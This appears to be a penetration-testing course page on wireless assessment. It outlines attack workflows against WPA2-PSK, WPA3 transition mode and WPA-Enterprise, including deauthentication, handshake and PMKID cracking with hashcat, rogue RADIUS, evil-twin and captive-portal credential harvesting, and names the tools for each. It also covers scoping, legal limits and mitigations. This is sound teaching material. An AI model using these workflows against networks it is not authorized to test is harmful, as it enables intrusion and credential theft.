Security · Topic 25 of 23 · Part V — Specialized assessment targets

Wireless assessment

The attacker is not inside the building — they are in the parking lot. Wireless extends the network's attack surface beyond every physical perimeter.

Syllabus: § Assessment of Infrastructure → Wireless and short-range radio
Topic 25 · Radio attack surface

What can an attacker do from radio range?

By the end of this topic you can:
  • Scope a wireless assessment, distinguishing it from a generic network test
  • Identify the authentication and encryption mode of an 802.11 network and its known weaknesses
  • Execute standard attack workflows against WPA2-PSK, WPA3-SAE, and 802.1X / WPA-Enterprise
  • Recognize the role of evil-twin, captive-portal, and rogue-AP attacks in real engagements
  • Place Bluetooth, BLE, Zigbee, and other short-range radios in the assessment landscape
  • Produce wireless findings the network team can act on

Scoping a wireless engagement

  • Networks in scope: SSIDs, BSSIDs, bands (2.4 / 5 / 6 GHz), auth mode, physical location
  • Neighbouring airspace: passive monitoring catches third-party traffic; active attacks must not target third-party SSIDs
  • Credential capture authorized? Handshake capture for offline cracking must be explicit
  • Guest networks: often a separate scoping question
  • Physical location and timing: lobby, conference room, parking lot, roof
  • Spectrum legality: certain bands require licensing in Switzerland and the EU; tester equipment must comply
  • Disruption tolerance: active deauthentication briefly disrupts service — the scope must say whether this is acceptable
Unique constraint The airspace is shared. Wireless scoping carries a regulatory dimension that generic network testing does not.

802.11 authentication modes

ModeStatusKey weakness
Open / unauthenticatedIn use for guest + captive portalAll traffic in cleartext on the air
WEPBroken since mid-2000sStatistical key recovery; should not exist
WPA2-PSK (CCMP/AES)Most common4-way handshake → offline dictionary attack on PSK
WPA2-Enterprise / 802.1XCorporate standardWeak when client does not validate RADIUS certificate
WPA3-SAEReplacing WPA2-PSKDragonblood (2019); downgrade in transition mode
OWEEncrypted-but-unauthenticated openBetter than open; not a replacement for authenticated modes

Real clients typically run a mix: WPA2-Enterprise on corporate, WPA2-PSK on IoT/BYOD, open + captive on guest, and a forgotten legacy SSID.

Reconnaissance — passive survey first

1 Survey the airspace Walk the perimeter with airodump-ng, kismet, or a vendor tool. Enumerate SSIDs, BSSIDs, channels, signal, standards, auth mode.
2 Map AP placement Heatmap shows where coverage leaks. Strong corporate-SSID signal in the parking lot is itself a finding.
3 Identify client probes Devices broadcast previously connected SSIDs. A laptop probing for Starbucks WiFi is opportunistic-attack material.
4 Read management frames Beacons, probe responses, and association requests leak vendor info, capabilities, and WPS state.

WPA2-PSK attack workflow

1 Capture 4-way handshake Wait for a client to authenticate, or send deauth frames to force reconnection (aireplay-ng, mdk4). Capture with airodump-ng.
2 Offline dictionary attack hashcat mode 22000 (supersedes 2500). Wordlists: rockyou, client-name + year + season, rule sets.
3 PMKID attack (optional) Many APs leak a PMKID in the first AKM exchange — no client interaction required. hcxdumptoolhashcat mode 22000.
Mitigations to assess
  • PSK length and complexity policy
  • Frequent PSK rotation
  • Client MAC isolation on the SSID
  • Segmentation: wireless SSID ↔ internal network

WPA-Enterprise — rogue RADIUS impersonation

The dominant pattern:

  1. Stand up an evil-twin SSID + rogue RADIUS server (hostapd-wpe, eaphammer, freeradius-wpe)
  2. Client roams to rogue AP; begins EAP authentication
  3. Rogue RADIUS captures the inner exchange
  4. For EAP-PEAP / MSCHAPv2: crack the challenge-response offline (asleap, hashcat)
  5. For EAP-TTLS/PAP: inner password arrives in cleartext

EAP-TLS (mutual cert): attacker cannot impersonate without the client certificate — the strong mode.

The decisive control Server certificate validation. A correctly configured client validates the RADIUS server's certificate against a trusted CA and a specific subject. Clients that trust any presented certificate are wide open.

The finding targets how client devices are configured (MDM / GPO), not the AP itself.

WPA3 — downgrade and Dragonblood

Downgrade (transition mode) A WPA3-SAE + WPA2-PSK dual-mode AP lets an attacker force a WPA2 association and attack the WPA2 handshake as usual. A "WPA3 network" in transition mode is not immune to the WPA2-PSK workflow.
Dragonblood (2019) Side-channel and timing attacks on early WPA3-SAE implementations (Vanhoef & Ronen). Mostly patched in current Wi-Fi 6 / 6E hardware; legacy devices may still be vulnerable.
Assessment note Always check vendor advisories for the equipment in scope. Confirm whether transition mode is enabled; verify WPA2 has been disabled on networks advertised as WPA3.

Evil twin, captive portal, rogue AP

Client-facing attacks

  • Evil twin: rogue AP with the same SSID (optionally BSSID-spoofed); clients with poor selection logic associate with the strongest signal
  • Captive-portal harvesting: rogue AP presents a fake portal imitating the company's SSO page to harvest credentials
  • Karma / probe-response: AP responds to every client probe request — client auto-connects to a network it "recognizes"

Tools: wifiphisher, airgeddon, eaphammer

Infrastructure-facing attack

Rogue AP on the wire A small AP plugged into a corporate switch port bridges the internal network to the airspace. NAC / 802.1X on switch ports is the missing control.

Distinct from the airspace attack — this is a physical-access finding that creates a wireless path.

Deauthentication and 802.11w / PMF

Deauthentication (deauth) frames are used in many attack workflows to force client reconnection and capture handshakes. They also function as a pure denial-of-service tool.

  • Without PMF, deauth frames are unauthenticated — any station can send them
  • 802.11w (Management Frame Protection) authenticates management frames, preventing the unprotected deauth attack
  • PMF is mandatory in WPA3; optional in WPA2
Assessment task Confirm whether PMF is enforced (not merely advertised as capable). A network that advertises PMF support but does not require it still allows unprotected deauth.
Scope constraint Continuous-wave jamming is illegal in most jurisdictions and out of scope for all normal engagements. Tactical deauth for short windows is in scope only when explicitly authorized.

Wireless intrusion detection (WIDS / WIPS)

Enterprises with sensitive airspace deploy WIDS / WIPS (Aruba RFprotect, Cisco wIPS, Extreme AirDefense) to detect rogue APs, evil twins, and unauthorized deauth.

The presence of WIPS does not preclude testing — it changes the testing posture and the expected findings.

What to assess
  • Is WIDS / WIPS deployed at all?
  • What signatures does it detect — and what does it miss?
  • How quickly do alerts reach a human responder?
  • Does WIPS automatically contain rogue APs, or only alert?

Beyond 802.11 — short-range radio landscape

Bluetooth / BLE

Peripherals, beacons, badge readers, medical devices. Attacks: passive sniffing (ubertooth, Sniffle); pairing-mode abuse; GATT enumeration of unauthenticated services.

Zigbee / Z-Wave / Thread

Smart-building, lighting, sensor networks. Older deployments use weak default keys. Tools: KillerBee, Ubertooth, Sonoff Zigbee dongles in sniffer mode, ApiMote.

NFC / RFID

Badge readers, payment terminals. Many older HID, MIFARE, and iCLASS variants are clonable with a Proxmark3 or a cheap reader. (Physical-intrusion overlap — see Topic 08.)

For a general infrastructure assessment: enumerate what radios are present, flag the high-risk ones, scope a specialist engagement for depth.

Tooling and hardware

Hardware

  • Monitor-mode-capable USB Wi-Fi adapter (Alfa AWUS036ACM / ACH or equivalent)
  • Wi-Fi 6 / 6E cards as drivers mature (updated kernels required)
  • Bluetooth / BLE: Texas Instruments CC26x2 (Sniffle), Ubertooth

Protocol analysis

  • Wireshark with radiotap-capable captures — excellent 802.11 dissection

Software

  • Capture / survey: airodump-ng, kismet, hcxdumptool
  • Deauth / injection: aireplay-ng, mdk4
  • Cracking: hashcat (mode 22000), aircrack-ng
  • Rogue AP / evil twin: hostapd-wpe, eaphammer, wifiphisher, airgeddon
  • BLE / Bluetooth: bluez, gatttool, bluetoothctl, Sniffle

Methodology — a typical wireless engagement

1Scope SSIDs in scope, physical location, authorized tests, neighbouring-airspace handling
2Survey Passive walk-around, heatmap, SSID and client enumeration
3Per-SSID attack Auth-mode identification; standard workflow for each mode
4Rogue AP / evil twin Client selection, cert validation, credential harvesting
5Switch-side rogue AP Can an unauthorized AP plug into a switch port and work?
6WIDS / WIPS What is detected, how fast does it reach a human
7Radio inventory BT, BLE, Zigbee, RFID — high-level posture

Reporting typically mixes configuration findings (PMF disabled, transition mode, weak PSK policy) and deployment findings (signal leak, slow rogue-AP detection, client cert validation off).

Check — rogue RADIUS and certificate validation

Reflection

Walk through the rogue-RADIUS attack against EAP-PEAP / MSCHAPv2. Where does the cryptographic weakness lie, and what client-side control defeats it?

Reveal answer

The tester's rogue AP presents a fake RADIUS server. The client begins EAP-PEAP and the server offers a certificate the client does not validate. The inner MSCHAPv2 exchange is captured and cracked offline. The defeating control is server certificate validation configured via MDM / GPO — requiring a specific trusted CA and subject name before the inner exchange begins.

What you take home

  • Wireless extends the attack surface to anyone in radio range — scoping must address the shared airspace explicitly
  • WPA2-PSK is cracked offline once the 4-way handshake (or PMKID) is captured; PSK strength and rotation are the key controls
  • WPA2-Enterprise is only as strong as the client's certificate validation policy
  • WPA3 in transition mode can be downgraded to WPA2 — "WPA3 deployed" is not sufficient without disabling WPA2 fallback
  • Evil-twin and captive-portal attacks target client behavior, not protocol weaknesses; rogue APs on switch ports bypass the airspace entirely
  • 802.11w (PMF) prevents unprotected deauth; its enforcement — not just capability — must be verified
  • Beyond 802.11, BLE, Zigbee, and RFID add radio surface that warrants at minimum an inventory and a risk posture

Next: Topic 26 — Cloud assessment. The attack surface moves from radio range to API endpoints and identity planes.

END · TOPIC 25

Scope the airspace. Test what is authorized.

Before the lab: confirm your USB Wi-Fi adapter passes through to the VM and appears in monitor mode.